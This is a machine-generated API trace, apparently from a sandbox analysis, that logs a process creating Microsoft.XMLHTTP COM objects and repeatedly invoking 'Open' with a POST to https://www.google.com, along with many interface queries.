	[0214.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0214.995] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0214.995] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x2
	[0214.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0214.995] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x2
	[0214.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c5aa0, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28da10*=0x0) returned 0x0
	[0214.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
	[0214.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
	[0214.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x62b540) returned 0x0
	[0214.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x62b540) returned 0x0
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040 | out: ppvObject=0x28c040*=0x62b540) returned 0x0
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c070 | out: ppvObject=0x28c070*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.996] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.996] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d168 | out: ppvObject=0x28d168*=0x62b540) returned 0x0
	[0214.996] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d160 | out: ppvObject=0x28d160*=0x0) returned 0x80004002
	[0214.997] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.997] longjmp () 
	[0214.997] longjmp () 
	[0214.997] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0214.997] SysStringLen (param_1=0x0) returned 0x0
	[0214.997] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0214.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0214.997] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0214.997] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0214.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0214.997] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0214.997] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x629bd0) returned 0x0
	[0214.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0214.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0214.997] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0214.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x629bd0) returned 0x0
	[0214.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x629bd0) returned 0x0
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x629bd0) returned 0x0
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.998] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x629bd0) returned 0x0
	[0214.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0214.998] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0214.998] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0214.999] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0214.999] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x2
	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0214.999] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x2
	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7450, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x460000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x460000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28da10*=0x0) returned 0x0
	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
